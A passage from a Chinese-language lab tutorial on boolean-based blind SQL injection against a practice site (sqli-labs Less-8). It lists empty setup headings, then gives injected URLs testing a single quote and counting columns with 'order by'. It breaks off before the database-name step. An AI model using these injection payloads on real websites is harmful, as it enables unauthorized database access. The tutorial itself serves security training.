一、预备知识
二、实验目的
三、实验工具
浏览器
四、实验环境
客户机一台
五、实验步骤
第一步:访问
http://www.any.com/sqli/Less-8/?id=1
页面正常:
第二步:加入单引号,访问
http://www.any.com/sqli/Less-8/?id=1'
不会报错,但是页面不正常,可以判断是bool型注入:
第三步:判断列数(通过二分法)
1)输入:
http://www.any.com/sqli/Less-8/?id=1' order by 3 %23
页面正常,说明大于等于3列:
2)输入:
http://www.any.com/sqli/?id=1' order by 4 %23
页面不正常,说明小于4列,结合上面的可以确定有3列:
第四步:查看数据库名称
1)输入: